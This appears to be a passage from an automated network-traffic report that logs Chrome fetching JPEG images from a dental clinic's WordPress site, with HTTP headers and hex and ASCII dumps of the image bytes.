                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 94 ad f0 6c e7 ad ed 5a fc 8f 1c d6 cd a7 7e 1b 32 66 32 56 a3 b9 9c a9 af 52 ba ba 3a d8 5e 18 d6 a9 c9 1a 27 27 a3 e8 6b cd 57 6a 55 55 77 7f 03 6f 23 54 7d 6b dc d6 6f 15 94 1f ba 55 74 6f b7 a9 9a d4 6a e5 85 27 55 24 a5 de 4a a9 9a 5f db 94 a8 e3 09 24 ea a5 6d 4d ae 7d 71 c1 b8 aa 4b 57 17 6e 9f ca cf 25 93 c8 ff 00 8f 9a 69 4a 3f 52 4e ae 13 6b 1c af de b6 64 ce 2b 58 cc cb d0 f2 39 10 c7 07 14 e9 de 87 99 f2 be 4a 38 eb 18 ba 27 7b 68 fe 66 9f 37 cd c5 62 59 5c 9d d7 b9 4b 54 cf 2b c8 e6 73 7c ae 47 8f 89 17 47 5f 73 d1 53 b5 4d 4d 6e dc de 0f 74 d2 63 ad f4 5b e5 3e e0 8f 1d ec 8c b7 cf a2 5e bd cf 3f 93 9d c9 e6 c9 b7 56 eb a3 bd 8e 97 17 c1 bc 9b a5 cb b4 e3 46 db ff 00 9b 4a d4 e9 61 f0 58 71 cd ca 35 6e 89 2e 87 69 74 d7 a7 37 d5 cb 69 e4 f2
                                                                                                                                      Data Ascii: lZ~2f2VR:^''kWjUUwo#T}koUtoj'U$J_$mM}qKWn%iJ?RNkd+X9J8'{hf7bY\KT+s|GG_sSMMntc[>^?VFJaXq5n.it7i
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: d1 76 38 dc 85 ba 4a 96 47 76 70 dd 0e 96 ab a3 f8 1c 4e 65 63 2a bd 2b 54 90 b0 88 e3 35 0c 89 36 e8 f5 a7 e4 7a ff 00 19 2f 6d 1c 95 ee d9 e3 b0 ca 31 95 5a 7a ab f7 3d 57 8d 93 71 49 24 da 5a fa 13 53 67 6b 93 85 72 f8 99 38 ef ff 00 99 1a 2f 46 7c 9f cb f0 a5 83 3e 4c 53 54 69 b4 7d 67 1b 8a d3 aa af c0 f2 5f 78 78 d5 ed e4 e1 55 ad e7 4e e6 b6 99 8c ce 2b c2 70 79 73 e2 e7 57 a5 19 f5 3f b6 fc ca e4 e3 8e 29 be 9f 99 f2 5e 4c 36 cb 72 b1 da f0 1e 4e 58 32 c5 27 4d af b9 89 71 c5 6a c7 d6 b9 9c 2c 79 62 f2 62 55 6e e7 1b e9 b8 4d a6 9a 4b 5e c7 53 c5 f9 08 f2 70 c1 3d 68 63 cb c2 a3 27 25 ee 4f a1 b6 5a 6a 2e 51 b2 b3 ef a9 9e 17 1c 73 4a 4a 97 ad 0c e3 0a 24 fb 14 cd 52 71 5f 8b 28 e2 7d c1 5c 59 e7 6b 64 f7 25 f1 d4 f1 7c 79 b5 e4 95 35 dc 7b bf b9
                                                                                                                                      Data Ascii: v8JGvpNec*+T56z/m1Zz=WqI$ZSgkr8/F|>LSTi}g_xxUN+pysW?)^L6rNX2'Mqj,ybbUnMK^Sp=hc'%OZj.QsJJ$Rq_(}\Ykd%|y5{
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: d0 99 30 da c3 cc c7 34 9e 9e 87 57 c7 a5 9f 3c 52 ba a9 e7 21 c7 94 1d 74 ea 7a 9f b6 b8 d3 5b b3 4e eb f9 6a 73 f2 ed ed d2 d7 4f 1e be ed e4 8f 4f 8d 24 92 45 b1 9b 4e c5 51 a1 2d dc f9 59 b9 cb e9 fb 66 1b 78 f9 0f 49 9b 0a 4a 57 4c e6 ee 26 19 5c 74 3b e9 e6 b3 8b cb cf e4 fc 79 79 d7 8a df 93 29 9b 22 39 d4 ac ec c8 9b 3d 12 cb cc 79 76 d6 eb 71 66 1a d9 65 44 ce 67 21 d4 e8 66 d0 e7 e6 d2 a6 91 cf e4 35 18 ba 9e 0f cf e4 dd 91 ae ac f6 7c fc bb 62 d9 e1 3c c4 f7 4a 52 ee c0 e3 b9 ef 83 ec ba 1a 9c 68 ee e6 25 af ba 95 37 71 e3 94 a1 2e dd 07 0b 06 ce 54 24 fb f5 27 a8 f7 9e 1b 8f b7 1c 2c 7a be 36 34 a2 8e 07 87 a3 c4 91 e9 38 f6 8a 20 d8 d8 b6 94 4e 37 36 d6 85 19 15 2e 58 2a d0 c7 ea 50 49 f5 35 e7 3a 01 6e 5c 9e d6 71 b9 99 d4 14 ae 6d e6 cf 45
                                                                                                                                      Data Ascii: 04W<R!tz[NjsOO$ENQ-YfxIJWL&\t;yy)"9=yvqfeDg!f5|b<JRh%7q.T$',z648 N76.X*PI5:n\qmE
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: fb 6a bf dc 4a 6d a7 47 5a 6a 8a 9a 71 9d 2b 46 ee 65 1b 64 55 a2 92 57 f5 44 19 51 6e ec f5 45 52 6e 32 a4 97 b2 5f b4 d8 95 e3 da 5d 3e 25 53 4b 24 2b 4b da bd d3 45 c1 2a d7 0d d1 57 ab 5d 5f 54 6b 4b da b6 d2 97 d0 bf 1b 71 92 af e1 dc c3 3c 77 55 e8 f5 8b 18 32 aa 53 69 51 bd 3a 9c de 52 6a 32 6b 4e da a2 ec f9 25 0a 4a ba ba 33 5f 2e 47 4a eb 17 60 38 7c b8 37 07 2b b6 bb 74 38 93 e1 7d 49 ef 5a bb 9e 97 3c 13 d2 cf 43 45 f1 e5 8a 73 5d 35 a3 fd a1 a7 0f 26 1a c5 c6 4a b2 fe 6f e2 72 39 58 da d7 5e eb 4a 1e af 3e 3a 35 96 2b 74 7f 99 7a 33 99 ce e0 47 dd 2c 6d 3e b4 7a 32 eb 79 4d a6 63 cf 2c fb 65 b6 4e dd bf 79 eb 7e df e6 55 47 05 6f fc af d0 f1 9c 88 38 e5 da e3 4b ff 00 b5 0e b7 8e cb 2c 52 8b 8d 63 25 74 75 97 db 8a f3 6d 3d d9 9e 8f a0 cb dd
                                                                                                                                      Data Ascii: jJmGZjq+FedUWDQnERn2_]>%SK$+KE*W]_TkKq<wU2SiQ:Rj2kN%J3_.GJ`8|7+t8}IZ<CEs]5&Jor9X^J>:5+tz3G,m>z2yMc,eNy~UGo8K,Rc%tum=
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: da ba 54 de 89 5d 8f 27 15 39 f1 f3 bb 29 e3 49 ae 9b 95 9b 39 f9 1a 51 95 1d 61 5a 45 bd 2a 75 39 49 65 e0 63 95 5b 51 94 92 95 2c ab 46 bb 1c 4e 4c dc 53 54 5e db 6d 5d 5f 73 a5 61 8f 19 4d 49 dd 35 2d 3a dd 77 36 21 cc cf e1 f9 f8 bc cf 8d ac 73 e1 5b 79 38 63 a6 4c 7a ca 9e a8 a7 8d 09 63 87 d4 dc 94 5b 96 d7 ae 86 c4 78 8b 93 0d f0 95 25 56 9d 1d 3f 12 59 2c c3 5d df 48 e7 71 fc 67 fa 97 f6 bc 27 c1 9c 57 3f 02 fa 9c 2c 92 b3 86 54 bd d8 a7 e9 2d 1f e2 7c 95 55 39 f1 79 69 e2 e4 e0 72 c5 97 14 af 28 ca 2e 8e 2c ed fd a9 ce f3 1e 07 ce cf 07 88 c1 fe 6a e6 2a cb 87 b9 63 6e 51 5b 9c a0 dd 55 68 99 d4 f3 18 7c 67 dd 12 c5 f7 7e 1c 13 c0 f1 67 c5 c7 f3 7c 55 44 e9 2b 47 3d 57 fe 96 73 99 9c 55 78 ec 7c 7e 46 6c d0 c1 c6 52 c9 39 c9 47 14 16 ae 4f 44 91
                                                                                                                                      Data Ascii: T]'9)I9QaZE*u9Iec[Q,FNLST^m]_saMI5-:w6!s[y8cLzc[x%V?Y,]Hqg'W?,T-|U9yir(.,j*cnQ[Uh|g~g|UD+G=WsUx|~FlR9GOD
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 84 f7 c2 6e 0d 68 d3 a1 bd c3 fb 9f 9d c7 6a 33 f7 c5 7c 99 c6 9c 9d 6c e8 ff 00 33 0a 57 5f c4 e3 e4 d3 5d ff 00 74 95 d3 5d ae bd 2e 1e e7 8d f7 17 03 97 45 97 fb 72 76 75 b1 d2 84 b0 67 be 1c b1 7f ed a1 f3 54 ef 6e bf 8d 8d de 1e 7e 4c 27 fd a9 ca 34 75 ef f9 1e 5d ff 00 0e 5e 74 b8 f8 5e 8e d3 cf 67 ee 99 7b d9 63 94 69 5b 98 7d 15 2e ba 9c ae 3f 91 e4 a8 a5 27 bb fa 9b b7 e4 6c bf 27 8e 36 ca b6 bf 43 95 fc 7f 2e bf ed cf c9 ab e5 d6 f4 b8 6f ae 02 9f f3 50 c5 f8 a7 27 69 1a 5f f9 ae 32 b6 e6 a9 dd 96 c7 cc e1 77 8e 55 f0 1e dc 7e ed 2a 5b 7b 6d 2a f7 e1 24 ff 00 9a bd 8d bc 78 39 38 b0 c3 14 26 e2 a2 f7 36 9d 2b 4e 86 83 f2 f1 b7 bd 57 b1 8c fc c4 12 75 ca 8b 36 9a f3 25 66 fb af 5a ea e4 fa f9 5f f7 25 17 24 db 8b ed f2 30 50 cd 44 a7 9a f7 f7 f5
                                                                                                                                      Data Ascii: nhj3|l3W_]t].ErvugTn~L'4u]^t^g{ci[}.?'l'6C.oP'i_2wU~*[{m*$x98&6+NWu6%fZ_%$0PD
                                                                                                                                      2024-04-24 10:13:31 UTC10646INData Raw: f7 57 1e 78 d3 9c a3 57 fa a8 eb ad 8b b3 71 bc 3f 94 52 73 84 63 2c bf cd 8d d2 fd e8 ec cf 98 c2 5b 5b 71 95 1f e4 6e e0 f2 19 b1 c2 9b 9b 6a c9 7a 33 5e e4 c3 d2 f3 7e c5 e3 e7 6e 7c 3e 4c 60 fa 46 7e da b3 8f 97 ec 1f 31 09 49 63 50 c8 95 1a 6a 6a e9 9b 18 3c df 2f 0e cc 9b b7 41 ea 9f a3 49 9b 0f ee 6e 5a 94 a3 09 b8 a8 fe a4 ff 00 65 fb 36 31 0e 79 cb 89 93 ec df 3f 8a 5b 5f 0a 52 ff 00 9a 0d 35 fb 4a bf fb 53 cf aa b5 c0 ca 97 aa ed f3 3d 12 fb ab 95 19 a6 f4 4b 45 66 db f8 98 3f bb 39 c9 d1 cb 4b b4 ee a8 31 0c b8 71 fb 47 cf e4 a6 de 14 95 55 69 27 14 fe 3a 96 63 fb 37 cf a6 f7 42 38 d4 5d 2f 38 9b b2 fb 9b 9a a5 79 ba 3b 26 fa 1a f9 be e0 e6 64 f7 4f 24 a8 dd d5 69 51 89 ea 66 fa 36 21 f6 6f 36 11 73 e5 73 70 63 8a ba da dc 9d 7f 22 65 e0 7c 6f
                                                                                                                                      Data Ascii: WxWq?Rsc,[[qnjz3^~n|>L`F~1IcPjj</AInZe61y?[_R5JS=KEf?9K1qGUi':c7B8]/8y;&dO$iQf6!o6sspc"e|o


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      67192.168.2.164979191.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:30 UTC671OUTGET /wp-content/uploads/2017/03/surgery.jpg HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/wp-content/themes/dentalhealthstop/style.css
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:30 UTC469INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:30 GMT
                                                                                                                                      content-type: image/jpeg
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:26 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 154921
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:30 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:30 UTC899INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 32 00 00 ff e1 03 81 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                      Data Ascii: ExifII*Ducky2http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                      2024-04-24 10:13:31 UTC14994INData Raw: 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 08 06 06 06 06 06 08 06 06 08 0c 08 07 08 0c 0e 0a 08 08 0a 0e 10 0d 0d 0e 0d 0d 10 11 0c 0e 0d 0d 0e 0c 11 0f 12 13 14 13 12 0f 18 18 1a 1a 18 18 23 22 22 22 23 27 27 27 27 27 27 27 27 27 27 01 09 08 08 09 0a 09 0b 09 09 0b 0e 0b 0d 0b 0e 11 0e 0e 0e 0e 11 13 0d 0d 0e 0d 0d 13 18 11 0f 0f 0f 0f 11 18 16 17 14 14 14 17 16 1a 1a 18 18 1a 1a 21 21 20 21 21 27 27 27 27 27 27 27 27 27 27 ff c0 00 11 08 03 e8 06 de 03 01 22 00 02 11 01 03 11 01 ff c4 00 c7 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 01 01 01 01 01 01 01 01 00
                                                                                                                                      Data Ascii: on> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Adobed#"""#''''''''''!! !!''''''''''"
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 5e 66 84 92 76 cf 17 a6 17 31 fe c7 05 f7 16 ef 3b 64 99 87 8f c9 af ea d5 59 f7 ed a1 f9 cc 1b 5e 0e 04 7b 42 77 6f 9c af c9 3b 63 f3 ec 9b 37 98 2c 71 92 ce fa 0a 71 02 4f f4 6a 15 63 73 de ad 4d 0d dd c4 74 f9 32 0c 3f fb 81 7e 8a 69 b1 93 f6 57 0c ea 0f 1f 1a 4f db a0 9c 77 83 25 1f 48 07 0f 5d 54 bb fa c9 f2 3b 7a 65 f9 e9 9e 61 dc 8e 0f 7c 13 f4 49 0b 4f b1 33 bb 5b c8 7f c4 ed 16 72 9e 25 a0 b3 b4 51 7d ce e7 ca 7b 3d cd 7c 7d be de 4e b8 9b fe 88 0b 93 71 f8 75 e5 b9 6b ff 00 a7 b6 33 ce 17 bd 9e c7 26 76 5e 53 e0 7e 6e b5 f2 13 37 96 a6 fd be d1 2c 64 e6 6d e6 c3 d0 e2 93 6c fc 9b 21 a7 89 7d 68 4f 12 c0 f0 3b 68 be 97 71 f8 59 b2 ba be 0b ee 61 ea 90 3f f5 da b9 93 fe 14 8c ed f7 37 f5 4b 10 23 f4 1c 13 1b 39 66 2e 77 7a 3c 74 7b 4e c8 70 b1 f3
                                                                                                                                      Data Ascii: ^fv1;dY^{Bwo;c7,qqOjcsMt2?~iWOw%H]T;zea|IO3[r%Q}{=|}Nquk3&v^S~n7,dml!}hO;hqYa?7K#9f.wz<t{Np
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 27 4c 72 24 0e b2 ac 8a d6 f6 e7 f6 30 49 20 e6 1a 69 e9 75 02 b2 5e 82 d7 4e 79 aa 9d 3a dd 17 97 77 39 05 5e d6 c4 3e 9b aa 7d 0d 5a e2 f2 c8 07 ed ee 7b 18 00 f5 9a a6 31 c6 c8 8e 19 98 9c 95 66 42 78 81 da bd 64 7b 16 d7 1b 7b cc 74 ae e6 f2 4a ae e3 66 b5 95 ba 63 26 30 32 00 02 3e 05 33 b7 aa ea f2 6e 98 03 4a 93 d4 12 0f 73 8d 03 0f 59 5d d9 36 39 18 6b 1c 8c 3d 60 83 f0 ac f2 6d 97 ad fd d8 77 d4 20 fc 49 91 ce f0 e8 3b c7 b0 28 90 d1 c2 ab 4c 96 f3 c7 fb 48 9e de b6 9f 81 67 71 19 57 15 33 45 2f 2e 39 2c 72 c2 1e 49 70 aa dc e5 53 82 0e 3d c6 db 6e fa 97 46 2b ce 8b 03 f6 f7 c5 5f 02 59 23 3f 45 c7 d8 6a bd 03 c2 cb 2b 41 41 c3 74 9b a4 38 36 60 f0 38 3d b8 fa 42 a9 db ad ec 7f b5 8b 57 4b 0f c6 ba 92 b0 70 58 27 8c 50 8a 20 c7 2e fe c6 b1 ce 90
                                                                                                                                      Data Ascii: 'Lr$0I iu^Ny:w9^>}Z{1fBxd{{tJfc&02>3nJsY]69k=`mw I;(LHgqW3E/.9,rIpS=nF+_Y#?Ej+AAt86`8=BWKpX'P .
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 49 71 f4 2f 29 e5 f6 b9 9e 62 bd 2f 6b 99 e2 0a b4 16 d0 0a fc 90 ee 22 94 af 4a f5 bb f3 9a 2c 20 8c 82 4c 93 0c 07 1d 21 ef a6 1d 4b cb 79 4a 76 4f 79 7d 2b 9a 01 0e 2c 61 26 ae a6 7d ee 4b d3 e1 ff 00 ed 3c 97 d6 be 77 9b fe b6 d9 e9 1b 7c dd 21 8b 66 9d ed 22 be 20 cc 57 26 1a e1 51 c3 a5 79 7b 66 80 cb 57 c0 c2 d6 3e dd a5 ad 26 a4 07 1c 9c 71 af 4a ef f9 ed ce 3b 0c ad 8e ae 7b dd 2e 90 1a 5e 4d 18 05 34 b4 12 7b 02 c1 6a d2 db 4b 67 39 a4 11 6f 1d 45 29 f2 41 a2 f9 fe 5e 1b 6b dd f4 f7 f5 4f 67 07 cc ef 74 5b 05 c7 0a b2 5a d7 3a 69 2a 7f 84 6d d3 e3 3f ea 8a aa fc dc d9 e7 d8 a7 f0 a2 7b de e8 df 46 31 ae 73 b1 a3 45 1a d1 55 a3 f0 ce 29 ed a0 93 c7 8a 48 5c e7 00 04 8c 73 0e 5f 48 05 ca f0 db f1 75 fe ad ff 00 0f b9 f5 0d c5 fa 8b 07 20 b9 8f 5a
                                                                                                                                      Data Ascii: Iq/)b/k"J, L!KyJvOy}+,a&}K<w|!f" W&Qy{fW>&qJ;{.^M4{jKg9oE)A^kOgt[Z:i*m?{F1sEU)H\s_Hu Z
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: cd 99 e0 b5 ad 73 83 6a 30 a9 08 99 d2 99 0e a3 af 91 38 9a 2b 98 9a be e1 6f b8 58 c9 4f 0e ea 12 7a 25 67 c2 57 4e 19 43 87 75 ed 3d 4e 07 d8 57 e7 80 ed 54 1a 41 71 cb 25 a5 b2 5c db 91 dd 2c 39 e6 46 1d 14 29 a1 97 e8 b6 b8 80 2b 80 56 b5 dc 42 f8 06 db e6 7d d3 6f 99 b3 db 48 ea b4 d4 31 cf 2f 69 e8 2d 7e a0 42 fa 05 87 e2 ce cb 24 0c 66 f1 e5 e7 3a e6 9a 64 92 d1 ed 0c 77 d2 6b 1f 42 de aa a0 ea fe 24 df 98 3c ad 63 62 c6 ea 37 97 26 e1 c3 33 e1 c2 0b ce 1d 18 2f 15 b1 df cd f7 a1 b7 dc b8 4a d7 35 b2 5b 5c 37 e5 35 c2 a1 8e af 56 0b 67 9c fc c9 6f e6 49 ec 6e ec 63 7d a5 95 9d b9 64 2c 99 cd 0e f1 1c ea ba ad 6d 46 9d 2d 01 71 7c bf 1b a4 d5 74 d3 83 a6 86 de d0 71 68 63 fc 57 1e cc 7b 14 dd 78 7a 46 a3 ea bb 1e 0f 6a f7 36 6e ee 85 e1 36 62 43 9b
                                                                                                                                      Data Ascii: sj08+oXOz%gWNCu=NWTAq%\,9F)+VB}oH1/i-~B$f:dwkB$<cb7&3/J5[\75VgoInc}d,mF-q|tqhcW{xzFj6n6bC
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: db c8 f3 fb a7 bf c3 7f e6 cb a4 a9 81 dc 49 18 d0 38 62 d3 91 18 82 8a a0 75 4a a8 42 01 08 aa 10 15 42 48 40 20 9a 04 24 72 40 04 ea 47 14 90 a0 98 9a 46 e4 e2 a6 2e 9f f2 80 3d 61 52 91 41 ab c7 89 de f3 4b 7a 41 55 cd 3d bc 4d 2f 2f c0 70 21 50 56 1d c4 fd 89 52 c8 ab 9d bd da b7 2a 95 4b b7 f8 87 bb 19 3d 65 79 d7 1c 52 a9 59 1d e3 e6 27 83 dc 8c 76 ac ef df ee 5c 4d 03 42 e3 92 52 c7 9a 0e 93 b7 bb c3 93 e9 d4 15 2e dd af 5d 9c a5 61 29 51 06 97 5f 5d 3b 39 5d 8f 4a a5 d7 12 bb 37 9f 4a af 24 95 0c c8 e3 c5 40 b8 9e 28 29 28 0a a5 54 21 14 b1 c9 24 21 02 48 84 f0 42 2e 11 ea 55 c8 3b f0 fd 73 fa 8e 56 aa a4 f7 e1 fa e7 f5 1c a6 57 0f 78 84 93 5d 1c 80 4d 20 9a 06 84 93 45 09 a4 9a 01 09 26 80 42 48 40 d0 12 4d 40 21 09 2a 1a 45 09 15 02 2a 24 a9 15
                                                                                                                                      Data Ascii: I8buJBBH@ $r@GF.=aRAKzAU=M//p!PVR*K=eyRY'v\MBR.]a)Q_];9]J7J$@()(T!$!HB.U;sVWx]M E&BH@M@!*E*$
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: f4 1e 73 ea 2b 3f f4 a2 4e 6d 71 41 ec 6c ef 2c 77 48 cb ec e4 12 50 7d a4 44 51 ec fa ec 38 ac db 86 cb 6b 7d 1e 99 99 a8 8f 75 d9 39 bf 55 dc 17 91 2c 7c 72 36 68 5c e8 66 66 2d 95 87 4b 81 e8 2b d0 6d fe 68 2d a4 1b cb 3a 05 e4 63 0f f7 ac 19 75 b5 17 2f 3d b8 f9 7a f2 c8 b9 f0 83 3c 23 1c 07 7c 0e 96 f1 eb 0b 90 0f 25 f5 9d 10 dc 44 d9 62 73 65 89 de ec 8c 20 8e c2 17 0b 74 f2 d5 b5 e1 32 30 78 53 1f de b0 62 7e bb 72 29 85 78 44 9d ee 38 f4 15 b6 fb 6b bc db 9c 7e f0 ca c5 93 67 6e 2c 3d 7c bb 56 17 fb 8e ea 50 49 9e eb 7a 82 90 24 10 78 8c 94 5b ee 8e a0 a4 a0 e9 88 62 dd 9a 5d 61 1b 62 dc 40 ac bb 7b 7b ad 94 01 8c 96 95 f9 5f 3a 3f cd 5c f6 48 5a ea c6 e2 c7 b4 d0 fc 97 02 33 07 e2 55 9c 68 41 21 cd 21 cd 70 c0 82 32 20 f3 5d a8 f7 4d bf 76 60 b7
                                                                                                                                      Data Ascii: s+?NmqAl,wHP}DQ8k}u9U,|r6h\ff-K+mh-:cu/=z<#|%Dbse t20xSb~r)xD8k~gn,=|VPIz$x[b]ab@{{_:?\HZ3UhA!!p2 ]Mv`
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 45 c1 27 13 45 9a a2 bc 54 4a 75 51 25 01 55 12 99 2a 25 00 54 49 e2 99 2a 25 02 3e b5 02 a5 55 02 54 11 71 e0 aa 71 cd 4d c7 35 5b cd 10 53 21 54 38 ab 9e 78 2a 1c 78 f0 41 03 4c d5 72 10 02 99 3c f0 54 cb 95 10 66 90 e0 56 59 16 87 9c d6 59 0a 0a 1e 7f b1 52 f3 85 0a b1 e7 9f 15 4b 8e 28 2b 71 5d 78 d9 a7 cb 33 3e 9e f4 ed f5 55 71 9c 57 a4 74 24 79 59 8d f9 cf d5 ea 27 e0 44 7d 71 09 21 6c 34 24 84 02 10 95 54 0d 22 8a a5 54 0d 24 21 02 42 10 80 42 10 80 4d 24 20 10 13 a2 14 50 a0 54 8a 89 41 02 a0 68 a6 54 0a 08 39 50 f5 7b 95 4e 08 33 b9 20 9b d4 2a 82 75 c1 46 41 56 14 ea 91 c4 15 28 f0 72 9f b8 f9 be d6 53 83 65 76 83 d4 ec 17 b8 c9 78 9f 37 30 db dd da de 37 03 1c 80 d7 a8 af 68 c7 89 18 c9 06 4f 68 70 3d 62 ab 3c d7 91 a4 53 48 aa 11 51 29 a8 92
                                                                                                                                      Data Ascii: E'ETJuQ%U*%TI*%>UTqqM5[S!T8x*xALr<TfVYYRK(+q]x3>UqWt$yY'D}q!l4$T"T$!BBM$ PTAhT9P{N3 *uFAV(rSevx707hOhp=b<SHQ)
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 4d d6 f5 b7 59 02 6e ae 18 d7 7c c6 9d 4e 3d 8d 5c 4b cf 3b 35 82 96 36 c5 d5 f7 5f 31 a5 7a 9a 31 4c 53 2f 65 5a f4 ae 75 f6 f9 b5 6d f5 fb d5 db 1a e1 fb b6 9d 6f fc d6 d5 7c fa eb 7a dd f7 12 7e f3 72 e6 c6 7f 75 17 71 be ac d6 46 c3 6d f2 9a 41 3c 4a b3 6f aa 65 e9 af fc fe d1 56 6d d6 a5 c7 84 93 9a 0e c6 35 79 9b ef 30 ef 1b 89 22 e2 e9 c1 87 f7 51 f7 1b e8 6a cf 75 03 63 c4 1a 83 92 ca 02 d6 30 99 14 e2 85 20 d2 54 83 55 10 a2 74 56 69 4c 35 04 03 53 0d 56 08 cf 25 31 18 eb aa 0a 83 4a 90 8c ab c3 38 05 30 cf 4a 0a 5b 18 5e e3 c8 d3 78 51 5c 37 e6 b8 3b b1 78 e0 d5 ea 3c 9a ea 5c 5c c5 f3 99 92 97 81 1e f6 eb cd 9b 5d 93 40 9e 40 24 03 dd cc 95 e6 77 0f c4 09 a6 71 8b 6d 84 92 70 0f 77 c4 b9 7b a6 da cb 8b cf 15 f5 2d 03 dd 1f 09 59 8c fb 7d 90 d3
                                                                                                                                      Data Ascii: MYn|N=\K;56_1z1LS/eZumo|z~ruqFmA<JoeVm5y0"Qjuc0 TUtViL5SV%1J80J[^xQ\7;x<\\]@@$wqmpw{-Y}


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      68192.168.2.164978991.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:30 UTC680OUTGET /wp-content/uploads/2017/03/home-treatment-3.jpg HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/wp-content/themes/dentalhealthstop/style.css
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:30 UTC469INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:30 GMT
                                                                                                                                      content-type: image/jpeg
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:24 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 175350
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:30 GMT
